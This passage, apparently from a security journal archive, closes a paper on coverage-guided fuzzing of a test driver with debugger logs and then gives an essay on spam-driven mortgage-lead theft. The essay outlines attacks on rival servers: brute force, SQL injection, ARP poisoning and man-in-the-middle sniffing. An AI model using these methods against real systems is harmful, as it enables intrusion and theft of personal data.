testing cycle by exhausting all code paths and discovering all possible
bugs? Because fuzz testing can easily be random, so unpredictable, the
question of when to conclude testing is often left incomplete.
Pedram Amini, who recently released ``Paimei'', coined the term "Process
Stalking" as a set of runtime binary analysis tools intended to enhance
the visual effect of runtime analysis. His tool includes an IDA Pro
plug-in paired with GML graph files for easy viewing. His strategy
amalgamates the processes of runtime profiling through tracing and state
mapping, which is a graphic model composed of behavior states of a
binary. Pedram Amini's "Process Stalker" tool suite can be found on his
personal website (http://pedram.redhive.com) and the reverse engineering
website OpenRCE (http://www.openrce.org). -- might just use references
or something. The fact that process stalker is used to reverse MS Update
patches is irrelevant to the paper.
4.2) Stalking and Fuzzing Go Hand in Hand
Process Stalker was transformed by an individual into a windbg extension
for use in debugging user-mode and kernel-mode scenarios. This tool was
given the title ``Debug Stalk,'' and until now this tool has remained
unreleased. Process and Debug Stalker have overcome the static analysis
visualization setback by implementing runtime binary analysis. Runtime
analysis using Process and Debug Stalking in conjunction with
mathematically enhanced CFGs exponentially improves the bug hunting
mechanisms using fuzz techniques. Users can graphically determine via
runtime analysis which paths have not been traversed and which blocks
have not been executed. The user then has the opportunity to refine
their testing approach to one that is more effective. When testing a
large application, this technique dramatically reduces the overall
workload of said scenarios. Therefore, iterations of the Process Stalk
tool and the Debug Stalk tool will be used for investigating a faulty
driver in this paper.
Debug Stalk is a Windows debugger plug-in that can be used in places
where Process Stalking may not be suited, such as in a kernel-mode
setting.
5) Implementation
For the mere sake of simple illustration, several tools have been
created for testing our code coverage theories. Some of the test cases
have been exaggerated and are not real world examples. This testing
implementation is broken down into three parts: Part I includes sending
garbage to the device driver with dumb fuzzing; Part II will include
smarter fuzzing; Part III is a breakdown of how an intelligent level of
fuzzing helps improve code coverage while testing. First, a very simple
device driver named pluto.sys was created for the purpose of this paper.
It contains several blocks of code with decision based branching that
will be fuzzed. The fuzzer will send iterations of random data to
pluto.sys. After fuzzing has completed, a post-analysis tool will review
executed code blocks within the driver. Part II will contain the same
process as Part I, however, it will include an updated fuzzer based on
our Part I post-analysis that will allow the driver to call into a
previously unexecuted code region. Part III uses the data collected in
Parts I and II as illustrative example of a proof of a beneficiary code
coverage thesis.
5.1) Stalking Setup
Several software components need to be acquired before Stalking can
begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and
the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both
his blog and on the OpenRCE website. The Process Stalker contains files
such as the IDA Pro plug-in, and Python scripts that generate the GML
graph files that will be imported into GDE. GDE provides a functional
mechanism for editing and positioning of graphs including clustered
graphing, creation and deletion of nodes, zooming and scrolling,
automatic graph layout. Components can be obtained at the following
locations:
GDE: http://www.oreas.com/gde_en.php
Python: http://www.python.org/download
Proc Stalker: http://www.openrce.org/downloads/details/171/Process Stalker
Debug Stalk: http://www.nologin.org/code
5.2) Installing the Stalker
A walkthrough of installation for Process Stalker and required
components will be covered briefly in this document, however, more
detailed steps and descriptions are provided in Pedram's supporting
manual. The .bpl file generated by the IDA plug-in will spit out a
breakpoint list for entries within each block. The IDA plug-in
processstalker.plw must be inserted into the IDA Pro plug-ins directory.
Restarting IDA will allow the application to load the plug-in. A
successful installation of the IDA plug-in in the log window will be
similar to the following:
[*] pStalker> Process Stalker Profiler
[*] pStalker> Pedram Amini <pedram.amini@gmail.com>
[*] pStalker > Compiled on Sep 21 2006
Generating a .bpl file can be started by pressing Alt+5 within the IDA
application. A dialog appears. Make sure that ``Enable Instruction
Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all
selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl
file must be named relative to its given name. For example, if calc.exe
is being watched, the file name must be calc.exe.bpl. In our case,
pluto.sys is being watched, so the file name must be pluto.sys.bpl. A
successful generation of a .bpl file will produce the following output
in the log window:
talker> Profile analysis 25% complete.
[*] pStalker> Profile analysis 50% complete.
[*] pStalker> Profile analysis 7% complete.
[*] pStalker> Profile analysis 100% complete.
Opening the pluto.sys.bpl file will show that records are colon
delimited:
pluto.sys:0000002e:0000002e
pluto.sys:0000006a:0000006a
pluto.sys:0000007c:0000007c
5.3) Installing Debug Stalk
The Debug Stalk extension can be built as follows. Open the Windows
2003 Server Build Environment window. Set the DBGSDK_INC_PATH and
DBGSDK_LIB_PATH environment variables to specify the paths to the
debugger SDK headers and the debugger SDK libraries, respectively. If
the SDK is installed at c:\WINDBGSDK, the following would work:
set DBGSDK_INC_PATH=c:\WINDBGSDK\inc
set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib
This may vary depending on where the SDK is installed. The directory
name must not contain a space (' ') in its path. The next step is to
change directories to the project directory. If Debug Stalk source
code is placed within the samples directory within the SDK (located
at c:\WINDBGSDK), then the following should work:
cd c:\WINDBGSDK\samples\dbgstalk-0.0.18
Typing build -cg at the command line to build the Debug Stalk project.
Copy the dbgstalk.dll module from within this distribution to the root
folder of the Debugging Tools for Windows root directory. This is the
folder containing programs like cdb.exe and windbg.exe. If you have a
default installation of "Debugging tools for Windows" already installed,
the following should work:
copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\"
The debugger plug-in should be installed at this point. It is important
to note that Debug Stalk is a fairly new tool and has some reliability
issues. It is a bit flakey and some hacking may be necessary in order to
get it running properly.
5.4) Stalking with Kernel Debug
5.4.1) Part I
For testing purposes, a Microsoft Operating System needs to be set up
inside of a Virtual PC environment. Load the pluto.sys driver inside of
the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd
is loaded and attached to a process within the Virtual Machine, Debug
Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl
file path]" at the kd console. For example:
C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (c) Microsoft Corporation. All rights reserved.
Opened \\.\pipe\woo
Waiting to reconnect...
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
Kernel Debugger connection established.
Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp2_rtm.040803-2158
Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7)
System Uptime: 0 days 0:06:50.610
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus+0x4:
804e3b25 cc int 3
kd> .reload
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
Loading Kernel Symbols
.......................................................
Loading User Symbols
Loading unloaded module list
...........
kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl
[*] - Entering Stalker
[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl
[*] - Breakpoint Restore...: OFF
[*] - Register Enumerate...: ON
[*] - Kernel Stalking:.....: ON
current context:
eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
Once Debug Stalk is loaded, a list of commands is available to the user. A
breakdown of the command line options offered by Debug Stalk is as follows:
[m] module list
[0-9] enter recorder modes
[x] stop recording
[v] toggle verbosity
[q] quit/close
At this point, the fuzz tool needs to be executed to send random arbitrary data
to the device driver. While the fuzzer is running, Debug Stalk will print out
information to kd. Pressing 'g' at the command line prompt will resume
execution of the target machine. This invocation will look something like
this:
kd> g
[*] - Recorder Opened......: pluto.sys.0
[*] - Recorder Opened......: pluto.sys-regs.0
Modload: Processing breakpoints for module pluto.sys at f7a7f000
Modload: Done. 46 of 46 breakpoints were set.
0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)]
0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx
0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)]
0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de)
0034ef16 T:00000001 [bp] f7a801de 55 push ebp
0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4]
0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h
0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h
0034f148 T:00000001 [bp] f7a802ab 5f pop edi
00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8]
0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0
003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h]
00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4]
003593e1 T:00000001 [bp] f7a80122 6a10 push 10h
0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax
003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4]
00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi
00359614 T:00000001 [bp] f7a80182 5f pop edi
0035ac5b T:00000001 [bp] f7a8002e 55 push ebp
current context:
eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> q
[*] - Exiting Stalker
q
Debug Stalk has finished Stalking the points in the driver allowed by the
fuzzer. Files named "pluto.sys.0," "pluto.sys-regs.0 (optional)," have been
saved to the current working directory.
5.5) Analyzing the output
Pedram has developed a set of Python scripts to support the .bpl and recorder
output file, such as adding register metadata to the graph, filtering generated
breakpoint lists, additional GDE support for difficult graphs, combining
multi-function graphs into a conglomerate graph, highlighting interesting
blocks, importing back into the IDA changes made directly to the graph, adding
function offsets to breakpoint addresses and optionally rebasing the recording
addresses, and much more. Pedram provides detailed descriptions and usage of
his python scripts in his manual. The Python scripts used for formatting the
.gml files (for block based coverage) are psprocessrecording and
psviewrecordingfuncs. The psprocessrecording script is executed first on the
pluto.sys.0 which will produce another file called
pluto.sys.0.BadFuzz-processed. The psviewrecordingfuncs is executed on the
pluto.sys.0.BadFuzz-processed file to produce the file called BadFuzz.gml,
which is the chosen name for the initial testing technique. More information on
Pedram's Python scripts, reference the Process Stalking Manual. Opening the
resulting .gml file will enable us to view the following graph.
Executed blocks are available in pink, unexecuted blocks are shown as grey,
paths of execution are green lines, and unexecuted paths are red lines. At this
point it is important to note that the code block starting at address 00011169
does not get executed. This is detrimental to our testing process because it
appears that fuzzer supplied data is passed to it and it does not appear to get
executed. Based on this evidence, we can conclude that a readjustment of our
testing methodologies needs to be put in place so that we can hit that
unexecuted block.
Analysis indicates that the device driver does not execute block 00011169
because a comparison is made in the block at address 00011147 which reveals
that [eax] does not match a specified value. Since eax is pointing to the
fuzzer supplied data, we should be able to adjust the fuzzer to meet the
requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which
will allow us to get into block 00011169. BetterFuzz.exe was improved to do
complete the previous description.
5.5.1) Part II
Determining that the previous testing methodology is not effective, a
re-engineering of the test case has been implemented and re-testing the driver
to hit the missed block can now be accomplished. Following the steps provided
in Part I, the driver is loaded into the Virtual PC, kd is attached to the
driver process, and Debug Stalk has been loaded into kd and has been invoked to
run by using the 'g' command. The entire process is the same except that when
the new fuzz test is invoked, different output is printed to kd:
kd> g
[*] - Recorder Opened......: pluto.sys.0
[*] - Recorder Opened......: pluto.sys-regs.0
Modload: Processing breakpoints for module pluto.sys at f7a27000
Modload: Done. 46 of 46 breakpoints were set.
004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)]
004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx
00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)]
004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de)
00405462 T:00000001 [bp] f7a281de 55 push ebp
004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4]
0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h
00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h
00405694 T:00000001 [bp] f7a282ab 5f pop edi
00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8]
00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0
00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h]
00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4]
00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h
00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax
00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4]
004071ae T:00000001 [bp] f7a28169 6a04 push 4
current context:
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> k
ChildEBP RetAddr
f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction
f3c19768 805333be nt!KiBugCheckDebugBreak+0x19
f3c19b48 805339ae nt!KeBugCheck2+0x574
f3c19b68 805246fb nt!KeBugCheckEx+0x1b
f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5
f3c19bb4 804da1ee nt!KiTrap0E+0xcc
*** ERROR: Module load completed but symbols could not be loaded for pluto.sys
f3c19c48 f79f0173 nt!memmove+0x72
WARNING: Stack unwind information not available. Following frames may be wrong.
f3c19c84 8057a510 pluto+0x1173
f3c19d38 804df06b nt!NtWriteFile+0x602
f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8
0006fec0 7c90e9ff ntdll!KiFastSystemCallRet
0006fec4 7c81100e ntdll!ZwWriteFile+0xc
0006ff24 01001276 kernel32!WriteFile+0xf7
0006ff44 010013a7 betterfuzz_c!main+0xa4
0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f
0006fff0 00000000 kernel32!BaseProcessStart+0x23
current context:
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> q
[*] - Exiting Stalker
q
C:\Uninformed>
Generating the .gml file allows the tester to view the new execution path. In
this case the block at address 00011169 is executed. All subsequent blocks
underneath it are not executed because the driver BugChecks inside of this
newly hit block indicating a bug of some sort. Command 'k' in kd produces the
stack unwind information and we can see that a BugCheck was initiated for an
Access Violation that occurs inside of pluto.sys.
5.6) Part III
Analysis of the graph BadFuzz.gml generated in Part I indicated that the
testing methods used were not effective enough to exhibit optimal code coverage
of the device driver in question. Part II implemented an improved test case
based on the coverage analysis used in Part I. Graph BetterFuzz.gml allowed
test executers to view the improved testing methods to ensure that the missed
block was reached. This process revealed a fault in block 00011169 which would
have otherwise remained undetected without code coverage analysis.
6) Conclusion and Future Work
This paper illustrated an improved testing technique by taking advantage of
code coverage methods using basic graph theory. The author would like to
reiterate that the driver and fuzz tool used in this paper were simple examples
to illustrate the effectiveness of code coverage practices.
Finally, more research and experimentation are needed to fully implement these
theorems. The question remains on how to integrate a full code coverage
analysis tool and a fuzzing tool. Much work has been done on code coverage
techniques and their implementations. For example, the paper entitled
Cryptographic Verification of Test Coverage Claims, Devanbu, et al presents
protocols for coverage testing methods such as verifying coverage with and
without source code, with just the binary which can utilize both block and
branch testing (e0178[1].PDF). A tool to automate the espousal of code coverage
and fuzz technologies needs to be implemented so that the two technologies may
work together without manual investigation. Further research may include more
sophisticated coverage techniques using graph theory such as super blocks,
denominators, and applying weights to frequently used loops, paths and edges.
CFGs may also benefit from Bayesian networks which are a directed cyclic graph
of nodes represented as variables including distribution probability for these
variables given the values of its parents. In other words, the Bayesian theory
may be helpful for deterministic prediction of code execution which can in turn
lead to more intelligent fuzzing. In closing, the author extends the hope that
methods and methodologies shared herein can offer other ideas to researchers.
A. References
Devanbu, T (2000). Cryptographic Verification of Test
Coverage Claims. IEEE. 2, 178-192.

418
uninformed/5.4.txt Normal file
View File

@ -0,0 +1,418 @@
Wars Within
9/2006
Orlando Padilla
xbud@g0thead.com
1) Foreword
Abstract: In this paper I will uncover the information exchange of what
may be classified as one of the highest money making schemes coordinated
by 'organized crime'. I will elaborate on information gathered from a
third party individual directly involved in all aspects of the scheme at
play. I will provide a detailed explanation of this market's origin,
followed by a brief description of some of the actions strategically
performed by these individuals in order to ensure their success.
Finally, I will elaborate on real world examples of how a single person
can be labeled a spammer, malware author, cracker, and an entrepreneur
gone thief. For the purposes of avoiding any legal matters, and
unwanted media, I will refrain from mentioning the names of any
individuals and corporations who are involved in the schemes described
in this paper.
Disclaimer: This document is written with an educational interest and I
cannot be held liable for any outcome of the information released.
Thanks: vax, Shannon and Katelynn
2) Introduction
It is inherently obvious to anyone who owns a computer that the Internet
has changed the world around us in a significant number of ways. From
an uncountable number of careers to a world-wide open market, it
drastically affected everything around us. Don't worry though, I will
not bore you with another ``The future will look like this ... ''
article. For that, I will refer to you a great book by Michio Kaku
called Visions that is remarkably accurate considering it was written in
the mid 90's. But anyway, why am I restating the obvious? To allow
myself to focus on one not so obvious division of an existing market
developed by a corporation that had previously filed for bankruptcy. I
will elaborate on how it "innovated" one particular market and how that
change resulted in a ripple of disaster and greed. The market is real
estate and my focus is on mortgage leads
The idea of finding, selling and stealing leads is anything but new, in
fact Hollywood made a movie based entirely on the importance of sales
leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin
Diesel . The movie illustrates a perfect example of the significance of
even one major lead.
I will begin by explaining what mortgage leads are, why they are worth
writing a paper about and how certain individuals have made millions off
of them. I will then discuss the roles of the connected individuals and
how they continue to work when trust is the single point of failure. My
decision to write this article is nothing more than informational, I
have no intentions of ruining the lives of the people who make a living
from what I am about to discuss. In fact, it is to my knowledge not
much of a secret at all but I found it fascinating and wish to share my
experiences with anyone willing to listen.
3) Guidance
As I was growing up, my parents discouraged me from working while
attending school. They made a genuine attempt to provide for me the
support that I needed so that I could focus exclusively on my academics.
Their reasoning for this was simple - Once you start making money,
you'll forget what is important in life and will simply want to follow
this path. As you read through this paper, ask yourself how true this
actually is.
Financial gain drives every market around the world, and quite honestly
there are very few things the world as a whole has not yet done for
money. To quantify what my parents' believe, I will describe how the
lives of the people involved vary from the lives they once lived, and
from the lives of a person working a nine-to-five job.
4) The Entity
Mortgage leads, referred to as leads from this point on, are nothing
more than a selective set of criteria consisting of the following:
First Name
Last Name
Phone
City
State
Zip
Email
Loan Type
Loan Amount
Affiliate ID
Domain Ref.
Date
Each lead must contain at least the above criteria with the exception of
perhaps Affiliate ID and Domain Reference to be worth anything to a
buyer. Furthermore, the more reliable a set of leads is, the more it is
worth to a buyer. A buyer? You ask. Well, financing firms are
indirectly involved in this scheme; finance firms take the information
you sold to them, and follow up with the people allegedly interested in
buying, refinancing or applying for a home loan.
4.1) Background
To fully understand who is selling the collected information and to
elaborate on who is buying the information listed above, I'll introduce
hypothetical Corporation A to play the role of the real company. Corp.
A is a mortgage firm on the fall, not only are they on the verge of
closing shop but they have already filed for Chapter 11 bankruptcy and
are out of viable options for recovery. As a last resort they decide to
offer money in exchange for possible loan application candidate leads.
This quickly gained momentum as the Internet was a prime place for
accumulating such information. The plan eventually imploded, but before
diving into what the outcome was, I'll elaborate on how this truly
became its own market.
4.2) Numbers
Initially each collector averaged about 200 leads per sale which drove
just enough profits to keep the company afloat. The term collector in
this paper in its loosest sense is a name given to an individual who
collects mortgage leads for the purpose of attaining a profit. A lead
was first bought at a flat rate of 10 US dollars which at an average of
200 per sale the profit for the collector was a comfortable 2,000 US
dollars. On the flip side of things, Corp. A was successfully
conducting business averaging about 10 sales for every 100 leads they
bought. With these numbers consistently coming through Corp. A made a
profit of about 10,000 US dollars for every successful sale. A little
math illustrates the return on investment ratio:
Investment: 200 x 10 = 2000
Average Profit: 10,000 x 20 = 200,000
Return on Investment: 200,000 - 2,000 = 198,000
Based on the collection of an insignificant amount of information,
collectors aggressively innovated their collections methods. I will
elaborate on what I mean shortly. For now, I will focus on what happened
immediately after.
New collection methods drove the lead delivery out of control and soon
Corp. A was inundated with so many leads that they had to start turning
them down until they figured out how to process the volume. In order to
handle the number of leads they were now attaining, they decided to
partner with smaller companies and sell them the overflow. Corp. A was
now growing exponentially fast, and in a period of roughly five to six
years, this simple idea drove Corp. A from bankruptcy to a multi-billion
dollar corporation. It is actually rumored that at one point in time
this company consumed 100 of the mortgage leads ever processed in the
United States.
People and greed do not mix very well, and as I mentioned, earlier
collectors and partners wanted more money, so soon other companies began
buying leads from collectors too. I argue that at the time the mortgage
industry was large enough for everyone to profit nicely from it, however
greedy collectors began selling bogus or non-exclusive leads. This
forced mortgage firms to develop a loose classification model for
grading the quality of a lead as an addition to the classification of
the leads themselves.
- Exclusive
An exclusive lead is one that is sold only to one mortgage firm and never again
redistributed. The value of these leads was often higher than non-exclusive, or
as they decided to term them, semi-exclusive leads.
- Semi-Exclusive
Yes, semi-exclusive. I honestly cannot define this, as this is an
oxymoron itself, but someone somewhere. An individual who
wishes to stay anonymous informed me of terms commonly used.
decided to call non-exclusive leads semi-exclusive to allow them to
be resold. It's a nice euphemism, though.
Grade | Description
--------+-------------
Green | Confirmed Valid Lead
Yellow | Characteristics of a bad lead but enough good to buy
Red | Confirmed Invalid Lead
The reliability of a bulk set is assessed by the person buying them at
the time of sale. The person interested in buying the leads takes a
random set from the bulk he is receiving and personally verifies their
validity. A rating is then given depending on the number of missed
leads he finds. The grading is different with every person you deal
with, but in short a lead is only Green if validated. A validated lead
is one that is confirmed through the person who's information was sold
to begin with (The loan application candidate) goes through.. A yellow
lead is a lead with all information accurate but the candidate was
either not home or for some reason was not available. Last, a red lead
is a confirmed invalid or bogus lead. A number of things can give away
a bad lead, for example Zip code and State not matching, or the name
given is John Doe and the address contains Elm Street are probably
indications of a bad lead.
5) The War
Now that I have indulged you with the whereabouts and importance of a
lead, I will discuss how they are obtained. I mentioned above how far an
individual would go as a result of greed? Below I describe their
actions, which outlines their (at times) unethical behavior and
persistence to attain more of the goods.
5.1) Self Indulgence
When the collector decides to go a straight route (in terms of their
industry), they can invest some time and money into setting up an
infrastructure to lure potential clients to their web site. They first
need to build a site that resembles a loan agency that allows visitors
to send their applications to them. Once the collector has a website
saving information to a database, he now hires mailers or spammers to
advertise his website. The average return on spam has been extremely
dynamic, and with more advanced filtering mechanisms in place, all a
spammer can hope for is more effective evasion methods. The leads
collected through this method are, on average, valued between eight and
twelve US dollars per lead only because they are exclusive opt-ins. An
opt-in is a user who wishes to recieve information regarding the service
or product you provide. (i.e. no one else should have this information
as they obtained it directly from the client). There have been
instances when leads are scarse however, and opt-ins sold for over
twenty US dollars a lead. Semi-exclusive (or non-exclusive) leads on
the other hand are usually half or less than the price of an exclusive
lead.
The second method of collection is not as trivial as the first one
sounds, although the first is a bit more involved than I actually
described. I will elaborate further on what it takes to successfully
build the infrastructure described above shortly.
5.2) Thievery
Thievery obviously refers to stealing, and to steal, the collector has
to choose from an abundance of targets. Essentially, anyone
constructing an environment to collect leads themselves is a possible
target. Things fall into place fairly easily for a collector wanting to
find more targets -- recall how collectors use mailers as resources to
advertise their websites? This is a pretty viable method for collection
however, alternative methods do exist and collectors use any and all
possible enumeration methods they can think of. First, lets dive into
the details of what collectors looking to construct websites need to do
before hiring mailers since this is directly related to the enumeration
of targets.
5.3) Setting up an Infrastructure
So far all this seems pretty straight forward; they setup a webserver to
collect information about the people interested in mortgage loans and
the mailers responsible for advertising get a sales commission for leads
collected by their spam. Unsolicited e-mail, often of a commercial
nature, sent indiscriminately to multiple mailing lists, individuals, or
newsgroups; junk e-mail. run. To complete the cycle, the people
interested in loans receive an email which sparks their interest and
they navigate to the link found in the email. Collectors are usually
ambitious and make an eager attempt at keeping their domains, websites,
and mailers going round the clock. In the United States it is illegal
to spam a person without their consent, and to use spam as advertisement
to a website (the loan forms) hosted on a webserver in the US is not too
common but they do exist. The easiest thing for a collector to do is to
find a hosting provider in a communist country with no regard for the
content placed on their servers. The technical term for this type of
service is bullet-proof-hosting. A bullet-proof-host is a node on a
provider's network with extremly loose Terms of Service, often allowing
them to spam or host any content they wish. Usually the provider resides
in a third world or communist country.. The average price for such a
service is about 2,500 US dollars a month. An alternative to dishing out
large amounts of cash for hosting services is using a bot network. A
distributed collection of agents (bots) connected and controlled by a
central authority.. Usually though, bot networks are pretty dynamic and
don't fit the necessary requirements to host this type of content. If a
collector pays a mailer to spam his site for two or three days and the
host goes down the first night (because of an unreliable bot host) a lot
is lost and so generally experienced folks tend to pay for reliable
hosting.
Often, the businesses providing the bullet-proof-hosting servers are
relatively well known, and if they are known so is their allotted IP
space. This, in turn, makes finding servers hosting mortgage
applications a piece of cake. All one has to do is scan a known IP
segment for specific criteria and keep track of those that fit the
profile. Once a worthy target list has been collected, the attacks
follow. An interesting fact about the individuals involvement in this
industry is that nothing either one is doing is really all that legal.
This, in fact, allows an attacker to launch whatever type of attack he
wants on the victim machine with little to no worry about legal
repercussions. Often a collection machine will have several required
services open to the Internet, for example: http, ssh, ftp, mysql or
mssql and sometimes an administrative web interface. The scope of an
attack is unlimited and the number of man hours invested directly
reflects on the amount of traffic the victim website attracts. It is
even pretty common for certain prowlers to lease a server from the same
segment the victim machine is on simply to increase their odds of
breaching the host. The following shortly describes common attack
practices launched against victim websites.
- Brute-force Enumeration
An attacker will attempt to guess login and password pairs on any if
not all of these services. Usually this kind of attack is not too
stealthy, but remember there is little worry - I mean the victim
cannot simply pick up the phone and call his lawyer can he?
- SQL Injection
If any of the web interfaces are accessible through the site, sql
injection attacks are another vector for entry. Although the success
ratio of sql injection is now relatively low, there are still some
low hanging fruit to find and be assured someone greedy and
ambitious enough will find it.
- Classic Attacks
With the massively large number of exploits developed and released to
the public daily, searching and launching attacks is a frequent action.
This sometimes opens up a new market for exploit writers looking to
make some quick cash. Collectors can advertise the need for an exploit
and place a price on a particular application. There are even online
auctions that have been built specifically for this purpose.
- Passive / Passive Aggressive
When an attacker decides to lease a machine on the same segment, it
is usually because they failed to remotely compromise the victim's
machine. As a last resort they can do several things to retrieve
the information they are looking for. The attacker can launch an
ARP Poisoning attack and sniff all the incoming traffic to the
victim machines, an attacker can simply redirect all the client
requests to himself and collect the leads himself, or even hope for
the victim himself to logon and perform a man-in-the middle attack to
passively collect credentials.
6) More on The Money
In this section, I will associate the roles described above with the
amount of money they can generate. As described earlier, the mailer
serves as the core distributor of an advertising campaign. As a company
would pay a marketing company for it to advertise its products, a
collector pays a mailer to generate leads (e.g advertise and generate
revenue). He can also simply take matters into his or her own hands and
do the dirty work himself. If a mailer is hired however, to properly
track what a mailer collects there is a nifty procedure in place. Each
mailer is given a unique ID number and the link spammed in each email
contains the ID number. When a client submits information regarding his
loan inquiry, the mailer's ID number is included and the collector now
has record of how many leads a mailer is generating. This method of
tracking referrals is well adopted in most spam/advertising related
industries online. The majority of spyware and adware vendors leverage
this method of tracking to pay their affiliates.
A single spam run can be as large as two million emails. The time
needed to complete a run that big depends on a few key factors - the
method used for distribution and the spam software being used. If a
decent sized list of proxies is used you can send an average of about
forty thousand emails per half hour using Dark Mailer . With a little
math we can compute that transmitting two million emails would take
about twenty-five hours. More over, if I were to shoot low and say that
.01 percent of two million emails from a single spam run actually
worked, the return for the collector on exclusive leads is about 200
leads per mailer at 10 dollars a lead results to about 2,000 USD. The
mailers recieve on average about 8 per referal and can usually track
their statistics through a web-based front end tracking their return on
time investment in real-time.
7) The Disaster
So far, I've covered in fairly good detail the structure of what was
once a falling corporation taking a 180 degree turn and rising straight
back up to the top. It is too well known though, that what goes up must
come down and twice as fast as it went up.
The core of the problems started out when mailers began to falsify the
content of the spam for their collectors. Mailers noticed that the
lower the rate they advertised the more traffic they would drive to the
collector's website. More traffic indicated a higher collection of
leads which resulted in more money. Whether the mailers were aware of
the laws before they did what they did is unknown to me but their lies
resulted in law suites unfolding from all sides. Unhappy individuals
who had been promised a 1.9 - 2.5 interest rate on a loan began filing
law suites against the collectors. This resulted in a fairly large
chain of angry partners. The hierarchy below indicates the ripple of
disaster that came about.
8) Conclusion
It is fair to say that ambition can get the best out of people Indeed,
I'm sure these individuals are trying their best to make a profit out of
this endeavor. Unfortunately, it is not the most appropriate way to
make a living; it does however show that their perception is a bit
different. Most of them feel that by staying away from selling drugs
and pornography online, they are not hurting anyone and simply taking
advantage of a good way to make some money. In retrospect, I agree, but
I refuse to condone spam for any reason, it consumes countless corporate
man hours and is a general nuisance to anyone who receives email.
A. References
Spammer-X, ``Inside the spam cartel." http://www.oreilly.com/catalog/1932266860/.
